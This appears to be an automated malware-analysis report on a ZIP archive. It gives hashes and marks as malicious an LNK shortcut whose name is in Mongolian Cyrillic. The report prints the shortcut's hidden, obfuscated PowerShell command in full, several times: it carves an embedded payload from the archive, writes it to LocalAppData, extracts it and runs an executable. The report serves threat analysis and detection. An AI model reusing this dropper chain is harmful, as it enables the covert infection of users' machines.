20063941491e5727cb2cbf824c656294
ZIP Archive | MD5: 20063941491e5727cb2cbf824c656294 | Size: 670.99 KB | application/zip

| Hash | Hash Value |
|---|---|
| MD5 | 20063941491e5727cb2cbf824c656294 |
| SHA1 | f99cf85b16f054713aedc017011803a45e3f3114 |
| SHA256 | a059d70e4f9095f167bd34ea4dfdab33be8f599907daefbd05f2ba3f2d6302be |
| SHA384 | 25245b00659a80342ac2b3972fd46a3386d995b7f5f5dc4aabdd3e6a2ba178eecd95a25ce958df7513399d1b31d1b784 |
| SHA512 | 4f277557099ef5233dd8e51e09ae58bc479279eb3ece3c9a45bd58e3a014949265154adb8fc4f70d387eca74c656ff5202b7a83d6e4738b33c8cc6b803600849 |
| SSDeep | 12288:wdIM5CKurUbWLD596+I9sRTSnwFJqs7rR04bqDY001b7undDG0:wdIM5CK4UbWLDolYMs3R04bCI1fui0 |
| TLSH | A6E4BE01FFA09135E16B167248D6B2710A3FBEB54BB089C7BB91071A4B302D5B9376F6 |

| Name | Value |
|---|---|
| LNK: Command Execution | powershell.exe -w H ";$dcxtboewo = (ls -Pa $Home -Re -in 'ЕС-аас Х?нд?ж болзошг?и? асуудал.zip')[0].fullname;$nugcjmw = [SyStem.IO.File]::OpenReAd($dcxtboewo); $jpjlvlwrj = NeW-ObjEct byte[] $nugcjmw.Length; $nugcjmw.Read($jpjlvlwrj, 0, $jpjlvlwrj.Length); $nugcjmw.Close();$lwjap='wRi'+'tEAlL'+'bYtEs';$uysqzmr=1164; ;;[SySTem.IO.FIle]::$lwjap($Env:LocalAppdata+'\\rlylgjvgdr.so', $jpjlvlwrj[$uysqzmr..($uysqzmr+669696-1)]); ; TaR -xvf $Env:LocalAppdata\rlylgjvgdr.so -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\THUAPBYP-BIPG-TWAK-NIVO-UUAWKJMVSHLT\CNMNSST.exe;" |
| Deobfuscated PowerShell | -w "H" ";$dcxtboewo = (ls -Pa $Home -Re -in '????-?????? ?????????? ?????????????????? ??????????????.zip')[0].fullname;$nugcjmw = [SyStem.IO.File]::OpenReAd($dcxtboewo); $jpjlvlwrj = NeW-ObjEct byte[] $nugcjmw.Length; $nugcjmw.Read($jpjlvlwrj, 0, $jpjlvlwrj.Length); $nugcjmw.Close();$lwjap='wRitEAlLbYtEs';$uysqzmr=1164; ;;[SySTem.IO.FIle]::$lwjap($Env:LocalAppdata+'\\rlylgjvgdr.so', $jpjlvlwrj[$uysqzmr..($uysqzmr+669696-1)]); ; TaR -xvf $Env:LocalAppdata\rlylgjvgdr.so -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\THUAPBYP-BIPG-TWAK-NIVO-UUAWKJMVSHLT\CNMNSST.exe;" |
| Deobfuscated PowerShell | $Env:LocalAppdata \thuapbyp-bipg-twak-nivo-uuawkjmvshlt\cnmnsst.exe "" |

| Name | Value | Verdict | Location |
|---|---|---|---|
| LNK: Command Execution | powershell.exe -w H ";$dcxtboewo = (ls -Pa $Home -Re -in 'ЕС-аас Х?нд?ж болзошг?и? асуудал.zip')[0].fullname;$nugcjmw = [SyStem.IO.File]::OpenReAd($dcxtboewo); $jpjlvlwrj = NeW-ObjEct byte[] $nugcjmw.Length; $nugcjmw.Read($jpjlvlwrj, 0, $jpjlvlwrj.Length); $nugcjmw.Close();$lwjap='wRi'+'tEAlL'+'bYtEs';$uysqzmr=1164; ;;[SySTem.IO.FIle]::$lwjap($Env:LocalAppdata+'\\rlylgjvgdr.so', $jpjlvlwrj[$uysqzmr..($uysqzmr+669696-1)]); ; TaR -xvf $Env:LocalAppdata\rlylgjvgdr.so -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\THUAPBYP-BIPG-TWAK-NIVO-UUAWKJMVSHLT\CNMNSST.exe;" | Malicious | 20063941491e5727cb2cbf824c656294 > ЕС-аас Хөндөж болзошгүй асуудал.lnk |
| Deobfuscated PowerShell | -w "H" ";$dcxtboewo = (ls -Pa $Home -Re -in '????-?????? ?????????? ?????????????????? ??????????????.zip')[0].fullname;$nugcjmw = [SyStem.IO.File]::OpenReAd($dcxtboewo); $jpjlvlwrj = NeW-ObjEct byte[] $nugcjmw.Length; $nugcjmw.Read($jpjlvlwrj, 0, $jpjlvlwrj.Length); $nugcjmw.Close();$lwjap='wRitEAlLbYtEs';$uysqzmr=1164; ;;[SySTem.IO.FIle]::$lwjap($Env:LocalAppdata+'\\rlylgjvgdr.so', $jpjlvlwrj[$uysqzmr..($uysqzmr+669696-1)]); ; TaR -xvf $Env:LocalAppdata\rlylgjvgdr.so -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\THUAPBYP-BIPG-TWAK-NIVO-UUAWKJMVSHLT\CNMNSST.exe;" | Malicious | 20063941491e5727cb2cbf824c656294 > ЕС-аас Хөндөж болзошгүй асуудал.lnk > LNK CommandLine |
| Deobfuscated PowerShell | -w "H" ";$dcxtboewo = (ls -Pa $Home -Re -in '????-?????? ?????????? ?????????????????? ??????????????.zip')[0].fullname;$nugcjmw = [SyStem.IO.File]::OpenReAd($dcxtboewo); $jpjlvlwrj = NeW-ObjEct byte[] $nugcjmw.Length; $nugcjmw.Read($jpjlvlwrj, 0, $jpjlvlwrj.Length); $nugcjmw.Close();$lwjap='wRitEAlLbYtEs';$uysqzmr=1164; ;;[SySTem.IO.FIle]::$lwjap($Env:LocalAppdata+'\\rlylgjvgdr.so', $jpjlvlwrj[$uysqzmr..($uysqzmr+669696-1)]); ; TaR -xvf $Env:LocalAppdata\rlylgjvgdr.so -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\THUAPBYP-BIPG-TWAK-NIVO-UUAWKJMVSHLT\CNMNSST.exe;" | Malicious | 20063941491e5727cb2cbf824c656294 > ЕС-аас Хөндөж болзошгүй асуудал.lnk > LNK CommandLine > [Deobfuscated PS] |
| Deobfuscated PowerShell | $Env:LocalAppdata \thuapbyp-bipg-twak-nivo-uuawkjmvshlt\cnmnsst.exe "" | Malicious | 20063941491e5727cb2cbf824c656294 > ЕС-аас Хөндөж болзошгүй асуудал.lnk > LNK CommandLine > [PowerShell Command] |